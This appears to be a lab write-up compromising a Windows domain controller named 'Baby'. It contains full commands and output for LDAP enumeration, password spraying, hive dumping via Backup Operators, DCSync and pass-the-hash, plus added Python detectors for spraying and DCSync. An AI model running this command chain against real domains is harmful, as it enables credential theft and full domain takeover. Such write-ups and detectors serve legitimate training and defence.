Machine Card for Baby

Reconnaissance

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-03-08 14:10:45Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=BabyDC.baby.vl
| Not valid before: 2025-03-07T13:59:12
|_Not valid after:  2025-09-06T13:59:12
| rdp-ntlm-info: 
|   Target_Name: BABY
|   NetBIOS_Domain_Name: BABY
|   NetBIOS_Computer_Name: BABYDC
|   DNS_Domain_Name: baby.vl
|   DNS_Computer_Name: BabyDC.baby.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2025-03-08T14:11:34+00:00
|_ssl-date: 2025-03-08T14:12:13+00:00; -1s from scanner time.
5357/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49675/tcp open  msrpc         Microsoft Windows RPC
51277/tcp open  msrpc         Microsoft Windows RPC
51292/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: BABYDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-03-08T14:11:38
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Based on the exposed ports (DNS, Kerberos, LDAP, SMB) the target is a Domain Controller, so I add baby.vl and babydc.baby.vl to my /etc/hosts file.

Initial Access

Anonymous bind on LDAP is allowed, so I can retrieve the list of domain users together with their description attributes via nxc.

$ nxc ldap baby.vl -u '' -p '' --users
LDAP        10.10.66.16     389    BABYDC           [*] Windows Server 2022 Build 20348 (name:BABYDC) (domain:baby.vl)
LDAP        10.10.66.16     389    BABYDC           [+] baby.vl\: 
LDAP        10.10.66.16     389    BABYDC           [*] Enumerated 9 domain users: baby.vl
LDAP        10.10.66.16     389    BABYDC           -Username-                    -Last PW Set-       -BadPW-  -Description-                                               
LDAP        10.10.66.16     389    BABYDC           Guest                         <never>             3        Built-in account for guest access to the computer/domain    
LDAP        10.10.66.16     389    BABYDC           Jacqueline.Barnett            2021-11-21 16:11:03 2                                                                    
LDAP        10.10.66.16     389    BABYDC           Ashley.Webb                   2021-11-21 16:11:03 2                                                                    
LDAP        10.10.66.16     389    BABYDC           Hugh.George                   2021-11-21 16:11:03 2                                                                    
LDAP        10.10.66.16     389    BABYDC           Leonard.Dyer                  2021-11-21 16:11:03 2                                                                    
LDAP        10.10.66.16     389    BABYDC           Connor.Wilkinson              2021-11-21 16:11:08 2                                                                    
LDAP        10.10.66.16     389    BABYDC           Joseph.Hughes                 2021-11-21 16:11:08 2                                                                    
LDAP        10.10.66.16     389    BABYDC           Kerry.Wilson                  2021-11-21 16:11:08 2                                                                    
LDAP        10.10.66.16     389    BABYDC           Teresa.Bell                   2021-11-21 16:14:37 2        Set initial password to <REDACTED>

The description of Teresa.Bell contains an initial password, but unfortunately it no longer works for that account. Spraying it against the list of accounts shows a hit on Caroline.Robinson: STATUS_PASSWORD_MUST_CHANGE means the password is correct but has expired and must be changed before it can be used.

$ nxc smb 10.10.66.16 -u users.txt  -p '<REDACTED>' --continue-on-success
SMB         10.10.66.16     445    BABYDC           [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False)
SMB         10.10.66.16     445    BABYDC           [-] baby.vl\Administrator:<REDACTED> STATUS_LOGON_FAILURE 
SMB         10.10.66.16     445    BABYDC           [-] baby.vl\Guest:<REDACTED> STATUS_LOGON_FAILURE 
SMB         10.10.66.16     445    BABYDC           [-] baby.vl\krbtgt:<REDACTED> STATUS_LOGON_FAILURE 
SMB         10.10.66.16     445    BABYDC           [-] baby.vl\dev:<REDACTED> STATUS_LOGON_FAILURE 
SMB         10.10.66.16     445    BABYDC           [-] baby.vl\Jacqueline.Barnett:<REDACTED> STATUS_LOGON_FAILURE 
SMB         10.10.66.16     445    BABYDC           [-] baby.vl\Ashley.Webb:<REDACTED> STATUS_LOGON_FAILURE 
SMB         10.10.66.16     445    BABYDC           [-] baby.vl\Hugh.George:<REDACTED> STATUS_LOGON_FAILURE 
SMB         10.10.66.16     445    BABYDC           [-] baby.vl\Leonard.Dyer:<REDACTED> STATUS_LOGON_FAILURE 
SMB         10.10.66.16     445    BABYDC           [-] baby.vl\Ian.Walker:<REDACTED> STATUS_LOGON_FAILURE 
SMB         10.10.66.16     445    BABYDC           [-] baby.vl\it:<REDACTED> STATUS_LOGON_FAILURE 
SMB         10.10.66.16     445    BABYDC           [-] baby.vl\Connor.Wilkinson:<REDACTED> STATUS_LOGON_FAILURE 
SMB         10.10.66.16     445    BABYDC           [-] baby.vl\Joseph.Hughes:<REDACTED> STATUS_LOGON_FAILURE 
SMB         10.10.66.16     445    BABYDC           [-] baby.vl\Kerry.Wilson:<REDACTED> STATUS_LOGON_FAILURE 
SMB         10.10.66.16     445    BABYDC           [-] baby.vl\Teresa.Bell:<REDACTED> STATUS_LOGON_FAILURE
SMB         10.10.66.16     445    BABYDC           [-] baby.vl\Caroline.Robinson:<REDACTED> STATUS_PASSWORD_MUST_CHANGE
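
Detection logic for the spray shown above, added here as an example that is not part of the original writeup. It runs over constructed 4625 failed-logon lines in an assumed key=value layout, flags a source that fails against many distinct accounts within a short window, and treats Status 0xC0000224 (password must change) as a confirmed-valid credential rather than a failure, because that is exactly the response that gave away Caroline.Robinson.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed 4625 events in an assumed "timestamp 4625 key=value ..." layout,
# modelled on what the SMB spray against the DC would leave in the Security log.
SAMPLE_EVENTS = """\
2025-03-08T14:20:01Z 4625 IpAddress=10.10.14.5 TargetUserName=Administrator LogonType=3 Status=0xC000006D SubStatus=0xC000006A
2025-03-08T14:20:02Z 4625 IpAddress=10.10.14.5 TargetUserName=Guest LogonType=3 Status=0xC000006D SubStatus=0xC000006A
2025-03-08T14:20:02Z 4625 IpAddress=10.10.14.5 TargetUserName=krbtgt LogonType=3 Status=0xC000006D SubStatus=0xC000006A
2025-03-08T14:20:03Z 4625 IpAddress=10.10.14.5 TargetUserName=Jacqueline.Barnett LogonType=3 Status=0xC000006D SubStatus=0xC000006A
2025-03-08T14:20:04Z 4625 IpAddress=10.10.14.5 TargetUserName=Ashley.Webb LogonType=3 Status=0xC000006D SubStatus=0xC000006A
2025-03-08T14:20:06Z 4625 IpAddress=10.10.14.5 TargetUserName=Caroline.Robinson LogonType=3 Status=0xC0000224 SubStatus=0x0
2025-03-08T14:31:00Z 4625 IpAddress=10.10.14.9 TargetUserName=Hugh.George LogonType=3 Status=0xC000006D SubStatus=0xC000006A
"""

STATUS_PASSWORD_MUST_CHANGE = "0xC0000224"  # NTSTATUS: password accepted but expired
LINE_RE = re.compile(r"^(\S+) 4625 (.*)$")

def parse_events(text):
    """Parse the sample layout into dicts; lines that are not 4625 are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        fields = dict(kv.split("=", 1) for kv in m.group(2).split())
        fields["ts"] = datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%SZ")
        events.append(fields)
    return events

def detect_spray(events, min_users=5, window=timedelta(minutes=5)):
    """Source IP -> sorted distinct accounts, for sources that failed against >= min_users accounts in one sliding window."""
    by_ip = defaultdict(list)
    for ev in events:
        by_ip[ev["IpAddress"]].append(ev)
    hits = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["ts"])
        for i, first in enumerate(evs):
            users = {e["TargetUserName"] for e in evs[i:] if e["ts"] - first["ts"] <= window}
            if len(users) >= min_users:
                hits[ip] = sorted(users)
                break
    return hits

def must_change_hits(events):
    """Accounts whose password was accepted but has expired: to the sprayer this is a confirmed-valid credential."""
    return sorted({e["TargetUserName"] for e in events
                   if e.get("Status") == STATUS_PASSWORD_MUST_CHANGE})
```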

Using changepasswd.py from impacket I set a new password for the account and can then use the credentials to list the exposed network shares.

$ impacket-changepasswd -newpass 'Helloworld123!' baby.vl/Caroline.Robinson@baby.vl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
Current password: 
[*] Changing the password of baby.vl\Caroline.Robinson
[*] Connecting to DCE/RPC as baby.vl\Caroline.Robinson
[!] Password is expired or must be changed, trying to bind with a null session.
[*] Connecting to DCE/RPC as null session
[*] Password was changed successfully.
 
$ nxc smb baby.vl -u Caroline.Robinson -p 'Helloworld123!' --shares
SMB         10.10.66.16     445    BABYDC           [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False)
SMB         10.10.66.16     445    BABYDC           [+] baby.vl\Caroline.Robinson:Helloworld123! 
SMB         10.10.66.16     445    BABYDC           [*] Enumerated shares
SMB         10.10.66.16     445    BABYDC           Share           Permissions     Remark
SMB         10.10.66.16     445    BABYDC           -----           -----------     ------
SMB         10.10.66.16     445    BABYDC           ADMIN$          READ            Remote Admin
SMB         10.10.66.16     445    BABYDC           C$              READ,WRITE      Default share
SMB         10.10.66.16     445    BABYDC           IPC$            READ            Remote IPC
SMB         10.10.66.16     445    BABYDC           NETLOGON        READ            Logon server share 
SMB         10.10.66.16     445    BABYDC           SYSVOL          READ            Logon server share

The read access on the C$ share allows me to retrieve the first flag.

Execution

Checking which groups the user Caroline.Robinson is a member of shows Backup Operators. By default, members of this group can log in interactively on any workstation or server [1].

$ nxc ldap baby.vl -u Caroline.Robinson -p 'Helloworld123!' -M whoami
SMB         10.10.66.16     445    BABYDC           [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False)
LDAP        10.10.66.16     389    BABYDC           [+] baby.vl\Caroline.Robinson:Helloworld123! (Pwn3d!)
WHOAMI      10.10.66.16     389    BABYDC           distinguishedName: CN=Caroline Robinson,OU=it,DC=baby,DC=vl
WHOAMI      10.10.66.16     389    BABYDC           Member of: CN=it,CN=Users,DC=baby,DC=vl
WHOAMI      10.10.66.16     389    BABYDC           Member of: CN=Backup Operators,CN=Builtin,DC=baby,DC=vl
WHOAMI      10.10.66.16     389    BABYDC           name: Caroline Robinson
WHOAMI      10.10.66.16     389    BABYDC           Enabled: Yes
WHOAMI      10.10.66.16     389    BABYDC           Password Never Expires: No
WHOAMI      10.10.66.16     389    BABYDC           Last logon: 133859211976451030
WHOAMI      10.10.66.16     389    BABYDC           pwdLastSet: 133859211743466518
WHOAMI      10.10.66.16     389    BABYDC           logonCount: 0
WHOAMI      10.10.66.16     389    BABYDC           sAMAccountName: Caroline.Robinson
 
$ evil-winrm -i babydc.baby.vl -u 'Caroline.Robinson' -p 'Helloworld123!'
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> hostname
BabyDC

Privilege Escalation

Membership in Backup Operators also grants SeBackupPrivilege, which allows me to back up any file on the host, including the registry hives. There is an nxc module called backup_operator that automates the process.

$ nxc smb baby.vl -u Caroline.Robinson -p 'Helloworld123!' -M backup_operator
SMB         10.10.66.16     445    BABYDC           [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False)
SMB         10.10.66.16     445    BABYDC           [+] baby.vl\Caroline.Robinson:Helloworld123!
BACKUP_O... 10.10.66.16     445    BABYDC           [*] Triggering RemoteRegistry to start through named pipe...
BACKUP_O... 10.10.66.16     445    BABYDC           Saved HKLM\SAM to \\10.10.66.16\SYSVOL\SAM
BACKUP_O... 10.10.66.16     445    BABYDC           Saved HKLM\SYSTEM to \\10.10.66.16\SYSVOL\SYSTEM
BACKUP_O... 10.10.66.16     445    BABYDC           Saved HKLM\SECURITY to \\10.10.66.16\SYSVOL\SECURITY
SMB         10.10.66.16     445    BABYDC           [*] Copying "SAM" to "/home/ryuki/.nxc/logs/BABYDC_10.10.66.16_2025-03-08_164706.SAM"
SMB         10.10.66.16     445    BABYDC           [+] File "SAM" was downloaded to "/home/ryuki/.nxc/logs/BABYDC_10.10.66.16_2025-03-08_164706.SAM"
SMB         10.10.66.16     445    BABYDC           [*] Copying "SECURITY" to "/home/ryuki/.nxc/logs/BABYDC_10.10.66.16_2025-03-08_164706.SECURITY"
SMB         10.10.66.16     445    BABYDC           [+] File "SECURITY" was downloaded to "/home/ryuki/.nxc/logs/BABYDC_10.10.66.16_2025-03-08_164706.SECURITY"
SMB         10.10.66.16     445    BABYDC           [*] Copying "SYSTEM" to "/home/ryuki/.nxc/logs/BABYDC_10.10.66.16_2025-03-08_164706.SYSTEM"
SMB         10.10.66.16     445    BABYDC           [+] File "SYSTEM" was downloaded to "/home/ryuki/.nxc/logs/BABYDC_10.10.66.16_2025-03-08_164706.SYSTEM"
BACKUP_O... 10.10.66.16     445    BABYDC           Administrator:500:aad3b435b51404eeaad3b435b51404ee:8d992faed38128ae85e95fa35868bb43:::
BACKUP_O... 10.10.66.16     445    BABYDC           Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
BACKUP_O... 10.10.66.16     445    BABYDC           DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
BACKUP_O... 10.10.66.16     445    BABYDC           $MACHINE.ACC:plain_password_hex:<REDACTED>
BACKUP_O... 10.10.66.16     445    BABYDC           $MACHINE.ACC: <REDACTED>
BACKUP_O... 10.10.66.16     445    BABYDC           dpapi_machinekey:<REDACTED>
dpapi_userkey:<REDACTED>
BACKUP_O... 10.10.66.16     445    BABYDC           NL$KM:<REDACTED>
SMB         10.10.66.16     445    BABYDC           [-] baby.vl\Administrator:8d992faed38128ae85e95fa35868bb43 STATUS_LOGON_FAILURE
BACKUP_O... 10.10.66.16     445    BABYDC           [*] Use the domain admin account to clean the file on the remote host
BACKUP_O... 10.10.66.16     445    BABYDC           [*] netexec smb dc_ip -u user -p pass -x "del C:\Windows\sysvol\sysvol\SECURITY && del C:\Windows\sysvol\sysvol\SAM && del C:\Windows\sysvol\sysvol\SYSTEM"

The Administrator hash from the SAM can’t be used to log in because it belongs to the local account rather than the domain one, but the NTLM hash of the Domain Controller’s machine account (BABYDC$, taken from the $MACHINE.ACC entry) has replication rights, so I can retrieve all the password hashes of the domain by using DCSync.

$ impacket-secretsdump -hashes :bf<REDACTED>fc 'BABY.VL/BABYDC$@baby.vl'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
 
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ee<REDACTED>3d:::
<SNIP>
[*] Cleaning up...
 
$ impacket-wmiexec -hashes :ee<REDACTED>3d Administrator@baby.vl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>hostname
BabyDC
 
C:\>whoami
baby\administrator
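
Detection logic for the DCSync step above, added here as an example that is not part of the original writeup. It reads constructed Security-log lines in an assumed field layout and correlates 4662 directory-access events that name the replication extended rights with the 4624 logon that supplied the source address. The inventory of DC accounts and addresses is an assumption; the point is that an allowlist on account names alone would pass this page’s attack, because BABYDC$ really is a domain controller, and only the source address gives it away.

```python
# GUIDs of the extended rights a DCSync requests (these are the real AD values).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
    "89e95b76-444d-4c62-991a-0facbeda640c",  # DS-Replication-Get-Changes-In-Filtered-Set
}
# Assumed inventory of legitimate DC accounts and the addresses they replicate from
# (constructed for this example; build it from your own DC list in practice).
KNOWN_DCS = {"BABYDC$": {"10.10.66.16"}}

# Constructed lines in an assumed "EventID key=value ..." layout. A 4624 network logon supplies
# the source address; the 4662 sharing its logon id the access. The all-zero GUID is a placeholder.
SAMPLE_EVENTS = """\
4624 TargetUserName=BABYDC$ TargetLogonId=0x3a9f1c IpAddress=10.10.14.5 LogonType=3
4662 SubjectUserName=BABYDC$ SubjectLogonId=0x3a9f1c ObjectType=domainDNS Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2},{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}
4624 TargetUserName=BABYDC$ TargetLogonId=0x3b0001 IpAddress=10.10.66.16 LogonType=3
4662 SubjectUserName=BABYDC$ SubjectLogonId=0x3b0001 ObjectType=domainDNS Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}
4624 TargetUserName=Caroline.Robinson TargetLogonId=0x3c0002 IpAddress=10.10.14.5 LogonType=3
4662 SubjectUserName=Caroline.Robinson SubjectLogonId=0x3c0002 ObjectType=user Properties={00000000-0000-0000-0000-000000000000}
"""

def parse(text):
    """Split each line into an event dict keyed by field name, plus EventID."""
    events = []
    for line in text.splitlines():
        eid, _, rest = line.partition(" ")
        fields = dict(kv.split("=", 1) for kv in rest.split())
        fields["EventID"] = eid
        events.append(fields)
    return events

def replication_rights(event):
    """Replication GUIDs named in a 4662 Properties field (braces stripped, case-folded)."""
    raw = event.get("Properties", "").replace("{", "").replace("}", "").lower()
    return set(raw.split(",")) & REPLICATION_RIGHTS

def detect_dcsync(events, known_dcs=KNOWN_DCS):
    """Alerts as (account, source_ip, reason) for replication requests that come
    from a non-DC account, or from a DC account at an address no DC uses."""
    logon_ip = {e["TargetLogonId"]: e["IpAddress"] for e in events if e["EventID"] == "4624"}
    alerts = []
    for e in events:
        if e["EventID"] != "4662" or not replication_rights(e):
            continue
        user, ip = e["SubjectUserName"], logon_ip.get(e["SubjectLogonId"], "unknown")
        if user not in known_dcs:
            alerts.append((user, ip, "replication by non-DC account"))
        elif ip not in known_dcs[user]:
            alerts.append((user, ip, "DC account replicating from a non-DC address"))
    return alerts
```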

Attack Path

flowchart TD

subgraph "Initial Access"
	A(Anonymous Bind on LDAP) -->|Retrieve Users| B(Name & Description)
	B -->|Password in Description| C(Valid initial Password)
	C -->|Password Spraying| D(Valid Credentials)
end

subgraph "Execution"
	D -->|Membership in Backup Operators| E(Access as Caroline.Robinson)
end

subgraph "Privilege Escalation"
	E -->|Backup of Registry Hives| F(Hash for BABYDC$)
	F -->|DCSync| G(NTLM Hash for Administrator)
end

Footnotes

  1. Allow log on locally - security policy setting